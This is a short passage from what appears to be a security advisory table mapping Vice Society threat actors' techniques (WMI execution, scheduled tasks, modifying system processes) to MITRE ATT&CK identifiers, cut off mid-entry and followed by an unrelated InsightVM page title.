\n\n[T1047](<https://attack.mitre.org/versions/v11/techniques/T1047/>)\n\n| \n\nVice Society actors leverage WMI as a means of \u201cliving off the land\u201d to execute malicious commands. WMI is a native Windows administration feature. \n \nScheduled Task/Job\n\n| \n\n[T1053](<https://attack.mitre.org/versions/v11/techniques/T1053/>)\n\n| \n\nVice Society have used malicious files that create component task schedule objects, which are often mean to register a specific task to autostart on system boot. This facilitates recurring execution of their code. \n \n**_Persistence_** \n \n**Technique Title**\n\n| \n\n**ID**\n\n| \n\n**Use** \n \nModify System Process\n\n| \n\n[T1543.003](<https://attack.mitre.org/versions/v11/techniques/T1543/003/>)\n\n| \n\nVice So

What's New in InsightVM: Q3 2021 in Review

Description

Related